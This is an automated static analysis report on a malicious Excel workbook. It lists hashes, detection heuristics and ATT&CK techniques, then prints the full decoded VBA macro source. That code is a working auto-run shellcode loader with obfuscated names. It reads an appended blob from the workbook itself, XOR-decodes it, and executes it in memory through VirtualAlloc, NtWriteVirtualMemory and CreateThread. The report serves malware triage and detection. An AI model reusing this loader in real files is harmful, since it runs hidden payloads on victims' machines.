Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ffaa63128e754131…

MALICIOUS

Office (OLE)

38.6 KB Created: 2017-07-31 10:12:36 Authoring application: Microsoft Excel First seen: 2017-08-08
MD5: d2829725d66227ec752f623d6cb13af3 SHA-1: 0d26d1a797e9127f80ce37d07823255b0d5a1602 SHA-256: ffaa63128e754131fddeeb31ef9a5c681e5242aa063280796ab44ad5c694143b
78 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The file contains both Excel 4.0 macros and VBA macros, with heuristics indicating the presence of a Document_Open and Workbook_Open macro. The VBA code uses API calls such as VirtualAlloc and CreateThread, suggesting it is designed to allocate memory and execute code, likely a second-stage payload. The presence of obfuscation and a long encoded blob further supports this. No specific IOCs like URLs or hashes were extracted.

Heuristics 6

  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Public Sub Document_Open()
        jNtjmvTAqPomOrPRs
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
        Document_Open
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 172 bytes
SHA-256: 63d3437f0ef9d6e6f7cafadd6a5473d8826a0decff0e7e519719b73893f4ae2d
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Makro
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4785 bytes
SHA-256: 60483b53313bbabff1c8766468df47091f6f480a06e9f757d38356b628face54
Detection
ClamAV: No threats found
Obfuscation or payload: likely
36 of 71 identifiers look randomly generated (e.g. 'fguJUUqORbZngqtMPClrhrSqHEaWDctVXxbrpLJw') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "BuÇalışmaKitabı"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit

#If VBA7 Then
Private Declare PtrSafe Function FPNcbrljAUS Lib "kernel32" Alias "CreateThread" (ByVal DmiPFsDOiuIxz As Long, ByVal XKdHHfpRcdLtOdm As Long, ByVal CzQmmdXClmO As LongPtr, wuwofj As Long, ByVal zlBiEcLjfdl As Long, zCVRjGnkTMAwurnuHGw As Long) As LongPtr
Private Declare PtrSafe Function ZIoAADnHSYuMKeNm Lib "kernel32" Alias "VirtualAlloc" (ByVal UxUUhHAwdVMUTZxL As Long, ByVal kdZEpQKkuusPSgpJ As LongPtr, ByVal HOIJQFukYHIVzqHha As Long, ByVal oZSEGjKMniHlOxltsIdOu As Long) As LongPtr
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal EurjcoUdKIRzaJHc As LongPtr, ByVal yYdrmDMS As LongPtr, ByVal KgYYdmnQvy As String, ByVal xgvRjxYtpwB As LongPtr, ByRef pBEPqgrQFrREOfMEFljojPK As LongPtr) As LongPtr
#Else
Private Declare Function FPNcbrljAUS Lib "kernel32" Alias "CreateThread"  (ByVal DmiPFsDOiuIxz As Long, ByVal XKdHHfpRcdLtOdm As Long, ByVal CzQmmdXClmO As Long, wuwofj As Long, ByVal zlBiEcLjfdl As Long, zCVRjGnkTMAwurnuHGw As Long) As Long
Private Declare Function ZIoAADnHSYuMKeNm Lib "kernel32" Alias "VirtualAlloc" (ByVal UxUUhHAwdVMUTZxL As Long, ByVal kdZEpQKkuusPSgpJ As Long, ByVal HOIJQFukYHIVzqHha As Long, ByVal oZSEGjKMniHlOxltsIdOu As Long) As Long
Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal EurjcoUdKIRzaJHc As Long, ByVal yYdrmDMS As Long, ByVal KgYYdmnQvy As String, ByVal xgvRjxYtpwB As Long, ByRef pBEPqgrQFrREOfMEFljojPK As Long) As Long
#End If

Const hTKdvqNRzZUMYNQVrVBmOOZqBF = &H1000
Const dCyRESLvwPriROgyaITJmRaU = &H40

Public Sub jNtjmvTAqPomOrPRs()
    Dim pnCVZcooWzxRDVBVqwT() As Byte

    pnCVZcooWzxRDVBVqwT = XlYAWJtovCzAJQJQAEaX(ActiveWorkbook.FullName)
    Dim Zerox As String
    Zerox = StrConv(pnCVZcooWzxRDVBVqwT, 64)
    
    Dim ptmpNBReTMXoNqVYytczmtK
    ptmpNBReTMXoNqVYytczmtK = Split(Zerox, "fguJUUqORbZngqtMPClrhrSqHEaWDctVXxbrpLJwMpQjHvsJPUqrgvvOodcpTulOHdpJocxdSPFSAIImlqgJMbPCbmclJtCrebBEfJuNwmyrQDoFuQeCnBcFoNIcZmuzmnOygegCWtmzCxMxYxQ")

    Dim asYrDkVoxnMUbHLVaybPYcJCfb As String
    Dim ZoliYfdOpezNF As String
    Dim yqLgnXeRGrOOOpyrNXPZUGMB As String
    ZoliYfdOpezNF = StrConv(StrConv(ptmpNBReTMXoNqVYytczmtK(UBound(ptmpNBReTMXoNqVYytczmtK)), 64), 128)
    yqLgnXeRGrOOOpyrNXPZUGMB = Mid$(ZoliYfdOpezNF, 3, Len(ZoliYfdOpezNF))

    asYrDkVoxnMUbHLVaybPYcJCfb = gzPIYZZkxicFnoan("pZdCYWqsasNkSZeCPPyqJBGUpDc", yqLgnXeRGrOOOpyrNXPZUGMB)
    
    #If VBA7 Then
        Dim rXetUuCPBJobhqUmstfZNKxIpZH As LongPtr
        Dim WCmCDXmVHcCvPspeSxSsY As LongPtr
    #Else
        Dim rXetUuCPBJobhqUmstfZNKxIpZH As Long
        Dim WCmCDXmVHcCvPspeSxSsY As Long
    #End If

    rXetUuCPBJobhqUmstfZNKxIpZH = ZIoAADnHSYuMKeNm(0, Len(asYrDkVoxnMUbHLVaybPYcJCfb), hTKdvqNRzZUMYNQVrVBmOOZqBF, dCyRESLvwPriROgyaITJmRaU)
    WCmCDXmVHcCvPspeSxSsY = NtWriteVirtualMemory(-1, rXetUuCPBJobhqUmstfZNKxIpZH, asYrDkVoxnMUbHLVaybPYcJCfb, Len(asYrDkVoxnMUbHLVaybPYcJCfb), 0)
    WCmCDXmVHcCvPspeSxSsY = FPNcbrljAUS(0, 0, rXetUuCPBJobhqUmstfZNKxIpZH, 0, 0, 0)
End Sub

Public Function XlYAWJtovCzAJQJQAEaX(ByVal IhyNrUUYJwmCEYczMPlHsqtBY As String) As Byte()
    Dim ZoliYfdOpezNF As Long
    Dim yqLgnXeRGrOOOpyrNXPZUGMB() As Byte
    ZoliYfdOpezNF = FreeFile
    If LenB(Dir(IhyNrUUYJwmCEYczMPlHsqtBY)) Then
        Open IhyNrUUYJwmCEYczMPlHsqtBY For Binary Access Read As ZoliYfdOpezNF
        ReDim yqLgnXeRGrOOOpyrNXPZUGMB(LOF(ZoliYfdOpezNF) - 1&) As Byte
        Get ZoliYfdOpezNF, , yqLgnXeRGrOOOpyrNXPZUGMB
        Close ZoliYfdOpezNF
    Else
        Err.Raise 53
    End If
    XlYAWJtovCzAJQJQAEaX = yqLgnXeRGrOOOpyrNXPZUGMB
    Erase yqLgnXeRGrOOOpyrNXPZUGMB
End Function

Public Sub Document_Open()
    jNtjmvTAqPomOrPRs
End Sub

Sub Workbook_Open()
    Document_Open
End Sub

Public Function gzPIYZZkxicFnoan(HUukrOqY As String, CXFUSDkIgypjH As String) As String
    Dim ODqgvMAJOMMYS As Long
    Dim nPKyKIxb As String
    Dim DqzuEhCXYZCFHaHVlQSj As Integer, qByHWZKOTPRudKZUcxLdMTet As Integer, a As Long

    For ODqgvMAJOMMYS = 1 To Len(CXFUSDkIgypjH)
        a = ODqgvMAJOMMYS Mod Len(HUukrOqY)
        If a = 0 Then a = Len(HUukrOqY)
        
        DqzuEhCXYZCFHaHVlQSj = Asc(Mid$(CXFUSDkIgypjH, ODqgvMAJOMMYS, 1))
        qByHWZKOTPRudKZUcxLdMTet = Asc(Mid$(HUukrOqY, a, 1))
        nPKyKIxb = nPKyKIxb + Chr(DqzuEhCXYZCFHaHVlQSj Xor qByHWZKOTPRudKZUcxLdMTet)
    Next ODqgvMAJOMMYS
    
   gzPIYZZkxicFnoan = nPKyKIxb
End Function